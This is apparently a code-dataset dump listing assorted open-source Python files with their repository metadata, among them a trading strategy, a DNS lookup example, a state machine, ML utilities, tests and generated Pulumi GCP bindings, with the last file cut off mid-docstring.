max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
gist_set.py | devnoname120/gist-alfred | 113 | 29515 | #!/usr/bin/python
# encoding: utf-8
from collections import Counter
from gist import create_workflow
from pprint import pprint as pp
import sys
import workflow
from workflow import Workflow, web
from workflow.background import run_in_background, is_running
def main(wf):
arg = wf.args[0]
wf.add_item(u"Set token", arg=arg, valid=True, icon="icons/token.png")
wf.send_feedback()
if __name__ == '__main__':
wf = create_workflow()
sys.exit(wf.run(main))
|
class_12/strategies/fixed_trade_price_strategy.py | taoranalex/course_codes | 121 | 29516 | <filename>class_12/strategies/fixed_trade_price_strategy.py
from howtrader.app.cta_strategy import (
CtaTemplate,
StopOrder,
TickData,
BarData,
TradeData,
OrderData,
BarGenerator,
ArrayManager
)
from howtrader.trader.constant import Interval
from datetime import datetime
from howtrader.app.cta_strategy.engine import CtaEngine, EngineType
import pandas_ta as ta
import pandas as pd
class FixedTradPriceStrategy(CtaTemplate):
"""
基于价格的定投
"""
author = "51bitquant"
fixed_trade_money = 1000 # 每次定投的资金比例.
price_change_pct = 0.05 # 价格变动多少的时候定投
parameters = ['fixed_trade_money', 'price_change_pct']
def __init__(self, cta_engine: CtaEngine, strategy_name, vt_symbol, setting):
""""""
super().__init__(cta_engine, strategy_name, vt_symbol, setting)
self.bg_4hour = BarGenerator(self.on_bar, 4, self.on_4hour_bar, Interval.HOUR)
self.am = ArrayManager(size=100) # 时间序列,类似我们用的pandas, 值保留最近的N个K线的数据.
def on_init(self):
"""
Callback when strategy is inited.
"""
self.write_log("策略初始化")
self.load_bar(1) # 具体加载多少天的数据, 1表示1天的数据,如果是2表示过去2天的数据
def on_start(self):
"""
Callback when strategy is started.
"""
self.write_log(f"我的策略启动")
self.put_event()
def on_stop(self):
"""
Callback when strategy is stopped.
"""
self.write_log("策略停止")
self.put_event()
def on_tick(self, tick: TickData):
pass
def on_bar(self, bar: BarData):
"""
Callback of new bar data update.
"""
self.bg_4hour.update_bar(bar) # 合成四小时的数据.
self.put_event()
def on_4hour_bar(self, bar: BarData):
"""
四小时的K线数据.
"""
self.cancel_all() # 撤销所有订单.
self.am.update_bar(bar) # 把最新的K线放进时间序列里面.
# 下面可以计算基数指标等等....
# 以及下单的事情.
if not self.am.inited:
return
# [0,1,2,3,4,5,6]
last_close_price = self.am.close_array[-2] # 上一根K线
current_close_price = bar.close_price # self.am.close_array[-1] # 当前的收盘价
# 如果四小时价格下跌5%就买入.
if (last_close_price - current_close_price)/last_close_price >= self.price_change_pct:
price = bar.close_price * 1.001
self.buy(price, self.fixed_trade_money/price)
self.put_event()
def on_order(self, order: OrderData):
"""
订单的回调方法: 订单状态更新的时候,会调用这个方法。
"""
self.put_event()
def on_trade(self, trade: TradeData):
"""
"""
self.put_event() # 更新UI界面方法。
def on_stop_order(self, stop_order: StopOrder):
"""
这个是一个停止单的方法,用来监听你止损单的方法。
"""
pass
|
external/unbound/libunbound/python/examples/async-lookup.py | simplixcurrency/simplix | 1,751 | 29530 | <reponame>simplixcurrency/simplix
#!/usr/bin/python
'''
async-lookup.py : This example shows how to use asynchronous lookups
Authors: <NAME> (vasicek AT fit.vutbr.cz)
<NAME> (xvavru00 AT stud.fit.vutbr.cz)
Copyright (c) 2008. All rights reserved.
This software is open source.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
from __future__ import print_function
import unbound
import time
ctx = unbound.ub_ctx()
ctx.resolvconf("/etc/resolv.conf")
def call_back(my_data,status,result):
print("Call_back:", sorted(my_data))
if status == 0 and result.havedata:
print("Result:", sorted(result.data.address_list))
my_data['done_flag'] = True
my_data = {'done_flag':False,'arbitrary':"object"}
status, async_id = ctx.resolve_async("www.nic.cz", my_data, call_back, unbound.RR_TYPE_A, unbound.RR_CLASS_IN)
while (status == 0) and (not my_data['done_flag']):
status = ctx.process()
time.sleep(0.1)
if (status != 0):
print("Resolve error:", unbound.ub_strerror(status))
|
dataloader/Dataset.py | mvemoon/TextClassificationBenchmark | 576 | 29568 | # -*- coding: utf-8 -*-
import os,urllib
class Dataset(object):
def __init__(self,opt=None):
if opt is not None:
self.setup(opt)
self.http_proxy= opt.__dict__.get("proxy","null")
else:
self.name="demo"
self.dirname="demo"
self.http_proxy="null"
self.urls=[]
self.root=".data"
self.saved_path= os.path.join(os.path.join(self.root,"clean"),self.name)
self.formated_files=None
def setup(self,opt):
self.name=opt.dataset
self.dirname=opt.dataset
self.http_proxy= opt.__dict__.get("proxy","null")
def process(self):
dirname=self.download()
print("processing dirname: "+ dirname)
raise Exception("method in father class have been called in processing: {} dataset".format(opt.dataset))
return dirname
def getFormatedData(self):
if self.formated_files is not None:
return self.formated_files
if os.path.exists(self.saved_path):
return [os.path.join(self.saved_path,filename) for filename in os.listdir(self.saved_path)]
self.formated_files = self.process()
return self.formated_files
def download_from_url(self,url, path, schedule=None):
#if schedule is None:
# schedule=lambda a,b,c : print("%.1f"%(100.0 * a * b / c), end='\r',flush=True) if (int(a * b / c)*100)%10==0 else None
if self.http_proxy != "null":
proxy = urllib.request.ProxyHandler({'http': self.http_proxy,'https': self.http_proxy})
# construct a new opener using your proxy settings
opener = urllib.request.build_opener(proxy)
# install the openen on the module-level
urllib.request.install_opener(opener)
print("proxy in %s" % self.http_proxy)
# urllib.request.urlretrieve(url,path,lambda a,b,c : print("%.1f"%(100.0 * a * b / c), end='\r',flush=True) if (int(a * b / c)*1000)%100==0 else None )a
try:
urllib.request.urlretrieve(url,path )
except:
import urllib2
urllib2.urlretrieve(url,path )
return path
def download(self,check=None):
"""Download and unzip an online archive (.zip, .gz, or .tgz).
Arguments:
check (str or None): Folder whose existence indicates
that the dataset has already been downloaded, or
None to check the existence of root/{cls.name}.
Returns:
dataset_path (str): Path to extracted dataset.
"""
import zipfile,tarfile
path = os.path.join(self.root, self.name)
check = path if check is None else check
if not os.path.isdir(check):
for url in self.urls:
if isinstance(url, tuple):
url, filename = url
else:
filename = os.path.basename(url)
zpath = os.path.join(path, filename)
if not os.path.isfile(zpath):
if not os.path.exists(os.path.dirname(zpath)):
os.makedirs(os.path.dirname(zpath))
print('downloading {}'.format(filename))
self.download_from_url(url, zpath)
ext = os.path.splitext(filename)[-1]
if ext == '.zip':
with zipfile.ZipFile(zpath, 'r') as zfile:
print('extracting')
zfile.extractall(path)
elif ext in ['.gz', '.tgz',".bz2"]:
with tarfile.open(zpath, 'r:gz') as tar:
dirs = [member for member in tar.getmembers()]
tar.extractall(path=path, members=dirs)
else:
print("%s do not need to be downloaded" % path)
return path
|
recipes/Python/578344_Simple_Finite_State_Machine_class_/recipe-578344.py | tdiprima/code | 2,023 | 29633 | #! /usr/bin/env python
""" Generic finite state machine class
Initialise the class with a list of tuples - or by adding transitions
<NAME> - November 2012
Released under an MIT License - free to use so long as the author and other contributers are credited.
"""
class fsm(object):
""" A simple to use finite state machine class.
Allows definition of multiple states, condition functions from state to state and optional callbacks
"""
def __init__(self, states=[]):
self._states=states
self.currentState = None
def start(self,startState=None):
""" Start the finite state machine
"""
if not startState or not (startState in [x[0] for x in self._states]):
raise ValueError("Not a valid start state")
self.currentState = startState
def stop(self):
""" Stop the finite state machine
"""
# Bug fix 15 Dec 2012 - self.currentState should be reset, not startState - Identified by <NAME>
self.currentState = None
def addTransition(self,fromState, toState, condition, callback=None):
""" Add a state transition to the list, order is irellevant, loops are undetected
Can only add a transition if the state machine isn't started.
"""
if not self.currentState:
raise ValueError("StateMachine already Started - cannot add new transitions")
# add a transition to the state table
self._states.append( (fromState, toState,condition, callback))
def event(self, value):
""" Trigger a transition - return a tuple (<new_state>, <changed>)
Raise an exception if no valid transition exists.
Callee needs to determine if the value will be consumed or re-used
"""
if not self.currentState:
raise ValueError("StateMachine not Started - cannot process event")
# get a list of transitions which are valid
self.nextStates = [ x for x in self._states\
if x[0] == self.currentState \
and (x[2]==True or (callable(x[2]) and x[2](value))) ]
if not self.nextStates:
raise ValueError("No Transition defined from state {0} with value '{1}'".format(self.currentState, value))
elif len(self.nextStates) > 1:
raise ValueError("Ambiguous transitions from state {0} with value '{1}' -> New states defined {2}".format(self.currentState, value, [x[0] for x in self.nextStates]))
else:
if len(self.nextStates[0]) == 4:
current, next, condition, callback = self.nextStates[0]
else:
current, next, condition = self.nextStates[0]
callback = None
self.currentState, changed = (next,True) \
if self.currentState != next else (next, False)
# Execute the callback if defined
if callable(callback):
callback(self, value)
return self.currentState, changed
def CurrentState(self):
""" Return the current State of the finite State machine
"""
return self.currentState
# -------------------------------------------------------------------------------------------------
# Example classes to demonstrate the use of the Finite State Machine Class
# They implement a simple lexical tokeniser.
# These classes are not neccesary for the FSM class to work.
# -------------------------------------------------------------------------------------------------
# Simple storage object for each token
class token(object):
def __init__(self, type):
self.tokenType = type
self.tokenText = ""
def addCharacter(self, char):
self.tokenText += char
def __repr__(self):
return "{0}<{1}>".format(self.tokenType, self.tokenText)
# Token list object - demonstrating the definition of state machine callbacks
class tokenList(object):
def __init__(self):
self.tokenList = []
self.currentToken = None
def StartToken(self, fss, value):
self.currentToken = token(fss.CurrentState())
self.currentToken.addCharacter(value)
def addCharacter(self, fss, value):
self.currentToken.addCharacter(value)
def EndToken(self, fss, value):
self.tokenList.append(self.currentToken)
self.currentToken = None
# Example code - showing population of the state machine in the constructor
# the Machine could also be constructed by multiple calls to addTransition method
# Example code is a simple tokeniser
# Machine transitions back to the Start state whenever the end of a token is detected
if __name__ == "__main__":
t = tokenList()
fs = fsm( [ ("Start","Start",lambda x: x.isspace() ),
("Start","Identifier",str.isalpha, t.StartToken ),
("Identifier","Identifier", str.isalnum, t.addCharacter ),
("Identifier","Start",lambda x: not x.isalnum(), t.EndToken ),
("Start","Operator", lambda x: x in "=+*/-()", t.StartToken ),
("Operator","Start", True, t.EndToken),
("Start","Number",str.isdigit, t.StartToken ),
("Number","Number",lambda x: x.isdigit() or x == ".", t.addCharacter ),
("Number","Start",lambda x: not x.isdigit() and x != ".", t.EndToken ),
("Start","StartQuote",lambda x: x == "\'"),
("StartQuote","String", lambda x: x != "\'", t.StartToken),
("String","String",lambda x: x != "\'", t.addCharacter ),
("String","EndQuote", lambda x: x == "\'", t.EndToken ),
("EndQuote","Start", True ) ] )
fs.start("Start")
a = " x123=MyString+123.65-'hello'*value"
c = 0
while c < len(a):
ret = fs.event(a[c])
# Make sure a transition back to start (from something else) does not consume the character.
if ret[0] != "Start" or (ret[0] == "Start" and ret[1] == False):
c += 1
ret = fs.event("")
print t.tokenList
|
src/main/python/counts_tools/exec/deviation_analysis.py | cday97/beam | 123 | 29642 | import ConfigParser
from datetime import datetime
import os
import sys
import numpy as np
import pandas as pd
import utils.counts
import utils.counts_deviation
__author__ = '<NAME>'
# This script finds the days with the greatest deviation from some reference value (such as hourly means or medians)
if __name__ == '__main__':
if len(sys.argv) < 2:
print 'ERROR: need to supply the path to the conifg file'
config_path = sys.argv[1]
conf = ConfigParser.ConfigParser()
conf.read(config_path)
# Paths
station_TS_dir = conf.get('Paths', 'station_TS_dir') # Path to station Time Series
ref_counts_file = conf.get('Paths', 'ref_counts_file')
out_file = conf.get('Paths', 'out_file') # Where to write the counts file
# Parameters
start_date = conf.get('Params', 'start_date')
end_date = conf.get('Params', 'end_date')
days = [int(d.strip()) for d in conf.get('Params', 'days').split(',')]
measure = conf.get('Params', 'measure')
# Get target dates
targ_dates = utils.counts.date_string_list(start_date, end_date, days)
# Create the counts file
ref = utils.counts.df_from_counts(ref_counts_file) # DF w/ mean flow for each link
measures = []
keepers = []
for i, stat in enumerate(ref.columns):
# Get path to stat ts file
print 'Processings station: %s' % str(stat)
print 'Number %d of %d' % (i, ref.shape[1])
ts_path = os.path.join(station_TS_dir, str(stat), 'time_series.csv')
c_dev = utils.counts_deviation.CountsDeviation(ts_path, targ_dates)
if c_dev.missing: # if there is missing data, we skip the whole station
print "Missing data. Skipping station: %s" % str(stat)
continue
c_dev.calc_measure(measure, reference=ref[stat])
measures.append(c_dev.measures[measure])
keepers.append(stat)
df = pd.DataFrame(measures).transpose()
df.columns = keepers
df.index = targ_dates
df.dropna(axis=1)
df['Max_Dev'] = df.apply(np.sum, axis=1)
df.to_csv(out_file)
|
boltstream/responses.py | geekpii/boltstream | 1,735 | 29643 | from django.http import HttpResponse
class HttpResponseNoContent(HttpResponse):
status_code = 204
|
res/TensorFlowPythonExamples/examples/while/__init__.py | bogus-sudo/ONE-1 | 255 | 29648 | import tensorflow as tf
i = tf.compat.v1.constant(0, name="Hole")
c = lambda i: tf.compat.v1.less(i, 10)
b = lambda i: tf.compat.v1.add(i, 1)
r = tf.compat.v1.while_loop(c, b, [i], name="While")
|
recipes/mio/all/conanfile.py | rockandsalt/conan-center-index | 562 | 29654 | <reponame>rockandsalt/conan-center-index
from conans import ConanFile, tools
import os
required_conan_version = ">=1.33.0"
class MioConan(ConanFile):
name = "mio"
description = "Cross-platform C++11 header-only library for memory mapped file IO."
license = "MIT"
topics = ("mio", "mmap", "memory-mapping", "fileviewer")
homepage = "https://github.com/mandreyel/mio"
url = "https://github.com/conan-io/conan-center-index"
settings = "os", "compiler"
exports_sources = "patches/**"
@property
def _source_subfolder(self):
return "source_subfolder"
def validate(self):
if self.settings.compiler.get_safe("cppstd"):
tools.check_min_cppstd(self, 11)
def package_id(self):
self.info.header_only()
def source(self):
tools.get(**self.conan_data["sources"][self.version],
destination=self._source_subfolder, strip_root=True)
def build(self):
for patch in self.conan_data.get("patches", {}).get(self.version, []):
tools.patch(**patch)
def package(self):
self.copy("LICENSE", dst="licenses", src=self._source_subfolder)
self.copy("*pp", dst="include", src=os.path.join(self._source_subfolder, "include"))
def package_info(self):
self.cpp_info.names["cmake_find_package"] = "mio"
self.cpp_info.names["cmake_find_package_multi"] = "mio"
self.cpp_info.components["mio-headers"].names["cmake_find_package"] = "mio-headers"
self.cpp_info.components["mio-headers"].names["cmake_find_package_multi"] = "mio-headers"
if self.settings.os == "Windows":
self.cpp_info.components["mio_full_winapi"].names["cmake_find_package"] = "mio_full_winapi"
self.cpp_info.components["mio_full_winapi"].names["cmake_find_package_multi"] = "mio_full_winapi"
self.cpp_info.components["mio_min_winapi"].names["cmake_find_package"] = "mio_min_winapi"
self.cpp_info.components["mio_min_winapi"].names["cmake_find_package_multi"] = "mio_min_winapi"
self.cpp_info.components["mio_min_winapi"].defines = ["WIN32_LEAN_AND_MEAN", "NOMINMAX"]
|
examples/titanic/assets/dataset/opener.py | eliaskousk/substra | 119 | 29663 | <reponame>eliaskousk/substra
import os
import pandas as pd
import random
import string
import numpy as np
import substratools as tools
class TitanicOpener(tools.Opener):
def get_X(self, folders):
data = self._get_data(folders)
return self._get_X(data)
def get_y(self, folders):
data = self._get_data(folders)
return self._get_y(data)
def save_predictions(self, y_pred, path):
with open(path, 'w') as f:
y_pred.to_csv(f, index=False)
def get_predictions(self, path):
return pd.read_csv(path)
def fake_X(self, n_samples=None):
data = self._fake_data(n_samples)
return self._get_X(data)
def fake_y(self, n_samples=None):
data = self._fake_data(n_samples)
return self._get_y(data)
@classmethod
def _get_X(cls, data):
return data.drop(columns=['Survived'])
@classmethod
def _get_y(cls, data):
return pd.DataFrame(data=data.get('Survived'), columns=['Survived'])
@classmethod
def _fake_data(cls, n_samples=None):
N_SAMPLES = n_samples if n_samples and n_samples <= 100 else 100
data = {
'PassengerId': list(range(N_SAMPLES)),
'Survived': [random.choice([True, False]) for k in range(N_SAMPLES)],
'Pclass': [random.choice([1, 2, 3]) for k in range(N_SAMPLES)],
'Name': ["".join(random.sample(string.ascii_letters, 10)) for k in range(N_SAMPLES)],
'Sex': [random.choice(['male', 'female']) for k in range(N_SAMPLES)],
'Age': [random.choice(range(7, 77)) for k in range(N_SAMPLES)],
'SibSp': [random.choice(range(4)) for k in range(N_SAMPLES)],
'Parch': [random.choice(range(4)) for k in range(N_SAMPLES)],
'Ticket': ["".join(random.sample(string.ascii_letters, 10)) for k in range(N_SAMPLES)],
'Fare': [random.choice(np.arange(15, 150, 0.01)) for k in range(N_SAMPLES)],
'Cabin': ["".join(random.sample(string.ascii_letters, 3)) for k in range(N_SAMPLES)],
'Embarked': [random.choice(['C', 'S', 'Q']) for k in range(N_SAMPLES)],
}
return pd.DataFrame(data)
@classmethod
def _get_data(cls, folders):
# find csv files
paths = []
for folder in folders:
paths += [os.path.join(folder, f) for f in os.listdir(folder) if f[-4:] == '.csv']
# load data
data = pd.DataFrame()
for path in paths:
data = data.append(pd.read_csv(path))
return data
|
test/integration/test_natural_language_understanding_v1.py | jsstylos/waston-developer-cloud-python-sdk | 1,579 | 29664 | # coding: utf-8
from unittest import TestCase
import os
import ibm_watson
import pytest
import json
import time
from ibm_watson.natural_language_understanding_v1 import Features, EntitiesOptions, KeywordsOptions
@pytest.mark.skipif(os.getenv('NATURAL_LANGUAGE_UNDERSTANDING_APIKEY') is None,
reason='requires NATURAL_LANGUAGE_UNDERSTANDING_APIKEY')
class TestNaturalLanguageUnderstandingV1(TestCase):
def setUp(self):
self.natural_language_understanding = ibm_watson.NaturalLanguageUnderstandingV1(version='2018-03-16')
self.natural_language_understanding.set_default_headers({
'X-Watson-Learning-Opt-Out': '1',
'X-Watson-Test': '1'
})
def test_analyze(self):
response = self.natural_language_understanding.analyze(
text='Bruce Banner is the Hulk and Bruce Wayne is BATMAN! '
'Superman fears not Banner, but Wayne.',
features=Features(entities=EntitiesOptions(), keywords=KeywordsOptions())).get_result()
assert response is not None
|
vit_jax/inference_time.py | fensence/Mixup-VT | 4,825 | 29722 | <reponame>fensence/Mixup-VT<gh_stars>1000+
# Copyright 2021 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import os
import time
from absl import logging
from clu import metric_writers
import flax
import flax.jax_utils as flax_utils
import jax
import jax.numpy as jnp
import ml_collections
import numpy as np
import tensorflow as tf
from vit_jax import checkpoint
from vit_jax import models
from vit_jax.configs import models as config_lib
def inference_time(config: ml_collections.ConfigDict, workdir: str):
"""Runs a number of steps and measures inference time."""
assert config.batch, f'Expected --config.batch={config.batch} > 0'
assert config.num_classes, (
f'Expected --config.num_classes={config.num_classes} > 0')
assert config.image_size, (
f'Expected --config.image_size={config.image_size} > 0')
# Build VisionTransformer architecture
model_config = config_lib.MODEL_CONFIGS[config.model_name]
model = models.VisionTransformer(
num_classes=config.num_classes, **model_config)
# Make sure initial model parameters (before replication) are on CPU only.
@functools.partial(jax.jit, backend='cpu')
def init(rng):
return model.init(
rng,
# Discard the "num_local_devices" dimension for initialization.
inputs=jnp.ones([1, config.image_size, config.image_size, 3],
jnp.float32),
train=False)
variables = init(jax.random.PRNGKey(0))
params_repl = flax_utils.replicate(variables['params'])
# pmap replicates the models over all TPUs/GPUs
vit_fn_repl = jax.pmap(functools.partial(model.apply, train=False))
images = jnp.ones([
jax.local_device_count(), config.batch // jax.local_device_count(),
config.image_size, config.image_size, 3
], jnp.float32)
writer = metric_writers.create_default_writer(workdir, asynchronous=False)
writer.write_hparams(config.to_dict())
logging.info('Starting training loop; initial compile can take a while...')
logits = vit_fn_repl(flax.core.FrozenDict(params=params_repl), images)
logits.block_until_ready()
logging.info('Done.')
logging.info('Going to run %d inferences WITHOUT measuring...',
config.initial_steps)
for _ in range(config.initial_steps):
logits = vit_fn_repl(flax.core.FrozenDict(params=params_repl), images)
logits.block_until_ready()
logging.info('Going to run %d inferences measuring...', config.steps)
times = []
for _ in range(config.initial_steps):
t0 = time.time()
logits = vit_fn_repl(flax.core.FrozenDict(params=params_repl), images)
logits.block_until_ready()
times.append(time.time() - t0)
logging.info('times=%s', times)
imgs_sec_core = config.batch / jax.local_device_count() / np.array(times)
logging.info('imgs_sec_core_min=%f', imgs_sec_core.min())
logging.info('imgs_sec_core_max=%f', imgs_sec_core.max())
logging.info('imgs_sec_core_mean=%f', imgs_sec_core.mean())
logging.info('imgs_sec_core_std=%f', imgs_sec_core.std())
writer.write_scalars(
0,
dict(
imgs_sec_core_min=imgs_sec_core.min(),
imgs_sec_core_max=imgs_sec_core.max(),
imgs_sec_core_mean=imgs_sec_core.mean(),
imgs_sec_core_std=imgs_sec_core.std(),
))
|
cloudmarker/test/test_azwebapphttp20event.py | TinLe/cloudmarker | 208 | 29726 | """Tests for AzWebAppHttp20Event plugin."""
import copy
import unittest
from cloudmarker.events import azwebapphttp20event
base_record = {
'ext': {
'record_type': 'web_app_config',
'cloud_type': 'azure',
'http20_enabled': True
},
'com': {
'cloud_type': 'azure'
}
}
class AzWebAppHttp20EventTest(unittest.TestCase):
"""Tests for AzWebAppHttp20Event plugin."""
def test_com_bucket_missing(self):
record = copy.deepcopy(base_record)
record['com'] = None
plugin = azwebapphttp20event.AzWebAppHttp20Event()
events = list(plugin.eval(record))
self.assertEqual(events, [])
def test_cloud_type_non_azure(self):
record = copy.deepcopy(base_record)
record['com']['cloud_type'] = 'non_azure'
plugin = azwebapphttp20event.AzWebAppHttp20Event()
events = list(plugin.eval(record))
self.assertEqual(events, [])
def test_ext_bucket_missing(self):
record = copy.deepcopy(base_record)
record['ext'] = None
plugin = azwebapphttp20event.AzWebAppHttp20Event()
events = list(plugin.eval(record))
self.assertEqual(events, [])
def test_record_type_non_web_app_config(self):
record = copy.deepcopy(base_record)
record['ext']['record_type'] = 'non_web_app_config'
plugin = azwebapphttp20event.AzWebAppHttp20Event()
events = list(plugin.eval(record))
self.assertEqual(events, [])
def test_http20_enabled(self):
record = copy.deepcopy(base_record)
record['ext']['http20_enabled'] = True
plugin = azwebapphttp20event.AzWebAppHttp20Event()
events = list(plugin.eval(record))
self.assertEqual(events, [])
def test_http20_disabled(self):
record = copy.deepcopy(base_record)
record['ext']['http20_enabled'] = False
plugin = azwebapphttp20event.AzWebAppHttp20Event()
events = list(plugin.eval(record))
self.assertEqual(len(events), 1)
self.assertEqual(events[0]['ext']['record_type'],
'web_app_http20_event')
self.assertEqual(events[0]['com']['record_type'],
'web_app_http20_event')
|
ranking/migrations/0056_auto_20201128_2316.py | horacexd/clist | 166 | 29737 | <gh_stars>100-1000
# Generated by Django 2.2.13 on 2020-11-28 23:16
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ranking', '0055_auto_20201009_0735'),
]
operations = [
migrations.AddIndex(
model_name='statistics',
index=models.Index(fields=['place_as_int', '-created'], name='ranking_sta_place_a_42252c_idx'),
),
]
|
examples/black_lives/create_progmem.py | fejiso/PxMatrix | 599 | 29754 | #!/usr/bin/python
import binascii
import sys
import glob, os
import pdb
file_no=0;
file_names=[];
RGB565=1;
out_string="";
def printrgb565(red, green, blue):
x1 = (red & 0xF8) | (green >> 5);
x2 = ((green & 0x1C) << 3) | (blue >> 3);
#pdb.set_trace()
this_string="0x" + str(binascii.hexlify(chr(x2))) + ",";
this_string+="0x" + str(binascii.hexlify(chr(x1))) + ",";
return this_string;
def printrgb888(red, green, blue):
this_string="0x" + str(binascii.hexlify(red)) + ",";
this_string+="0x" + str(binascii.hexlify(green)) + ",";
this_string+="0x" + str(binascii.hexlify(blue)) + ",";
return this_string;
out_string="uint8_t animation_lengths[]={";
for file in glob.glob("*.rgb"):
file_no=file_no+1;
file_names.append(str(file))
size = os.path.getsize(str(file))/64/32/3
out_string+=str(size)+ ",";
out_string=out_string[:-1];
out_string+="};\nconst uint8_t animations[] PROGMEM = {";
print (out_string)
byte_count=0;
for file_name in file_names:
size = os.path.getsize(str(file_name))
print(str(file_name)+ "- source_size: " + str(size));
with open(file_name, 'rb') as f:
byte0 = f.read(1)
while byte0 != "":
byte1 = f.read(1)
byte2 = f.read(1)
# Do stuff with byte.
if (RGB565):
out_string+=printrgb565(ord(byte0), ord(byte1), ord(byte2))
byte_count=byte_count+2;
else:
out_string+=printrgb888(byte0, byte1, byte2,out_string)
byte_count=byte_count+3;
if ((byte_count%10)==0):
out_string+="\n";
byte0 = f.read(1)
#print(str(file_name)+ "- out_size: " + str(byte_count));
out_string+="0x00};";
out_file = open("anim_data.h", "w");
out_file.write(out_string);
out_file.close();
|
sdk/python/pulumi_gcp/iam/workload_identity_pool_provider.py | sisisin/pulumi-gcp | 121 | 29762 | <filename>sdk/python/pulumi_gcp/iam/workload_identity_pool_provider.py
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['WorkloadIdentityPoolProviderArgs', 'WorkloadIdentityPoolProvider']
@pulumi.input_type
class WorkloadIdentityPoolProviderArgs:
def __init__(__self__, *,
workload_identity_pool_id: pulumi.Input[str],
workload_identity_pool_provider_id: pulumi.Input[str],
attribute_condition: Optional[pulumi.Input[str]] = None,
attribute_mapping: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
aws: Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
display_name: Optional[pulumi.Input[str]] = None,
oidc: Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']] = None,
project: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a WorkloadIdentityPoolProvider resource.
:param pulumi.Input[str] workload_identity_pool_id: The ID used for the pool, which is the final component of the pool resource name. This
value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
:param pulumi.Input[str] workload_identity_pool_provider_id: The ID for the provider, which becomes the final component of the resource name. This
value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
:param pulumi.Input[str] attribute_condition: [A Common Expression Language](https://opensource.google/projects/cel) expression, in
plain text, to restrict what otherwise valid authentication credentials issued by the
provider should not be accepted.
The expression must output a boolean representing whether to allow the federation.
The following keywords may be referenced in the expressions:
* `assertion`: JSON representing the authentication credential issued by the provider.
* `google`: The Google attributes mapped from the assertion in the `attribute_mappings`.
* `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`.
The maximum length of the attribute condition expression is 4096 characters. If
unspecified, all valid authentication credential are accepted.
The following example shows how to only allow credentials with a mapped `google.groups`
value of `admins`:
```python
import pulumi
```
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] attribute_mapping: Maps attributes from authentication credentials issued by an external identity provider
to Google Cloud attributes, such as `subject` and `segment`.
Each key must be a string specifying the Google Cloud IAM attribute to map to.
The following keys are supported:
* `google.subject`: The principal IAM is authenticating. You can reference this value
in IAM bindings. This is also the subject that appears in Cloud Logging logs.
Cannot exceed 127 characters.
* `google.groups`: Groups the external identity belongs to. You can grant groups
access to resources using an IAM `principalSet` binding; access applies to all
members of the group.
You can also provide custom attributes by specifying `attribute.{custom_attribute}`,
where `{custom_attribute}` is the name of the custom attribute to be mapped. You can
define a maximum of 50 custom attributes. The maximum length of a mapped attribute key
is 100 characters, and the key may only contain the characters [a-z0-9_].
You can reference these attributes in IAM policies to define fine-grained access for a
workload to Google Cloud resources. For example:
* `google.subject`:
`principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}`
* `google.groups`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}`
* `attribute.{custom_attribute}`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}`
Each value must be a [Common Expression Language](https://opensource.google/projects/cel)
function that maps an identity provider credential to the normalized attribute specified
by the corresponding map key.
You can use the `assertion` keyword in the expression to access a JSON representation of
the authentication credential issued by the provider.
The maximum length of an attribute mapping expression is 2048 characters. When evaluated,
the total size of all mapped attributes must not exceed 8KB.
For AWS providers, the following rules apply:
- If no attribute mapping is defined, the following default mapping applies:
```python
import pulumi
```
- If any custom attribute mappings are defined, they must include a mapping to the
`google.subject` attribute.
For OIDC providers, the following rules apply:
- Custom attribute mappings must be defined, and must include a mapping to the
